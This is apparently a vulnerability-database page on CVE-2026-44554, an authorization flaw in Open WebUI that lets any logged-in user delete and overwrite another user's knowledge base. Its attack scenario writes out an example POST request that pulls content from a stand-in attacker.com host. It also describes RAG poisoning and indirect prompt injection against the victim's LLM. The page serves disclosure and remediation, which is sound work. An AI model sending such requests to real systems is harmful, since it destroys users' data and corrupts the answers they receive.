What is the CVSS score of CVE-2026-44554?

CVE-2026-44554 has a CVSS 3.1 base score of 8.1 (High). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H. EPSS exploitation probability: 0.0%.

Which versions of Open WebUI are affected by CVE-2026-44554?

Open WebUI versions through 0.8.12 contain an authorization flaw that allows authenticated users to destroy or inject malicious content into any organization member's knowledge base, compromising the…. A patch is available.

Open WebUI CVE-2026-44554

EUVD-2026-30622 HIGH

Missing Authorization (CWE-862)

2026-05-08 https://github.com/open-webui/open-webui

GHSA-7r82-qhg4-6wvj

Authentication Bypass Python

8.1

CVSS 3.1

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Unchanged

Confidentiality

None

Integrity

High

Availability

High

Lifecycle Timeline

Source Code Evidence Fetched

May 08, 2026 - 20:33 vuln.today

Analysis Generated

May 08, 2026 - 20:33 vuln.today

CVE Published

May 08, 2026 - 19:51 nvd

HIGH 8.1

DescriptionNVD

Knowledge Base Destruction and RAG Poisoning via Unauthorized Collection Overwrite

Affected Component

Retrieval web/YouTube processing endpoints:

backend/open_webui/routers/retrieval.py (lines 1810-1837, process_web)
backend/open_webui/routers/retrieval.py (the parallel process_youtube endpoint)
backend/open_webui/routers/retrieval.py (line 1445, save_docs_to_vector_db call chain)

Affected Versions

Current main branch (commit 6fdd19bf1) and likely all versions with RAG/knowledge base functionality.

Description

The POST /api/v1/retrieval/process/web endpoint accepts a user-supplied collection_name and an overwrite query parameter (default: True). It performs no authorization check on whether the calling user owns or has write access to the target collection. When overwrite=True, save_docs_to_vector_db calls VECTOR_DB_CLIENT.delete_collection() on the target collection before writing new content.

Combined with the knowledge base enumeration vulnerability (separate report), an attacker can trivially discover any user's knowledge base UUID and then destroy or poison it.

python

# retrieval.py:1810-1837 - no collection authorization check
@router.post('/process/web')
async def process_web(
    request: Request,
    form_data: ProcessUrlForm,
    user=Depends(get_verified_user),
    ...
):
# ... fetch and process the URL ...
    save_docs_to_vector_db(
        request=request,
        docs=docs,
        collection_name=form_data.collection_name,
# attacker-controlled, unchecked
        overwrite=overwrite,
# defaults to True
        ...
    )

CVSS 3.1 Breakdown

Metric	Value	Rationale
Attack Vector	Network (N)	Exploited remotely via API call
Attack Complexity	Low (L)	Single API call with a known KB UUID
Privileges Required	Low (L)	Requires any authenticated user account
User Interaction	None (N)	No victim interaction required
Scope	Unchanged (U)	Impact within the knowledge base authorization boundary
Confidentiality	None (N)	No data disclosure from this vulnerability directly
Integrity	High (H)	Complete replacement of victim's KB content with attacker-controlled data
Availability	High (H)	Victim's original KB embeddings are deleted; KB effectively destroyed

Attack Scenario

Attacker discovers victim's KB UUID via the knowledge-bases meta-collection (separate finding) or other enumeration.
Attacker sends:

   POST /api/v1/retrieval/process/web?overwrite=true
   {
     "url": "https://attacker.com/poison",
     "collection_name": "<victim_kb_uuid>"
   }

The endpoint fetches content from the attacker's URL.
save_docs_to_vector_db deletes the entire vector collection belonging to the victim's knowledge base.
The attacker's fetched content is embedded and written as the new collection content.
Victim's RAG queries against their KB now return attacker-controlled content instead of their original documents.

Impact

Data destruction: Victim's original KB embeddings are permanently deleted from the vector store
RAG poisoning: Attacker-controlled content replaces legitimate knowledge, causing the LLM to return misleading or malicious answers to the victim
Indirect prompt injection: Poisoned content can contain crafted prompts that manipulate the victim's LLM behavior when queried
Persistence: The poisoned content persists until the KB is rebuilt from source files

Preconditions

Attacker must have a valid user account
Attacker must know the target collection name (KB UUID) - easily obtained via the knowledge-bases enumeration finding

AnalysisAI

Open WebUI through version 0.8.12 allows authenticated attackers to destroy or poison any user's knowledge base via unauthorized collection overwrite operations. The /api/v1/retrieval/process/web endpoint fails to verify collection ownership before performing delete-and-replace operations on vector database collections. …

RemediationAI

Within 24 hours: Inventory all Open WebUI deployments and confirm installed versions; restrict API access to /api/v1/retrieval/process/web endpoint via network controls if immediate patching is not possible. Within 7 days: Upgrade all instances to Open WebUI version 0.9.0 or later. …

Analysis

Detailed AI-generated intelligence summary covering attack vector, impact assessment, affected versions, remediation steps, and indicators of compromise.

POChttps://••••••••••.com/exploit

PATCHhttps://••••••••••.com/patch

ADVISORYhttps://••••••••••.com/advisory

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

CVE-2026-44554 vulnerability details – vuln.today

Back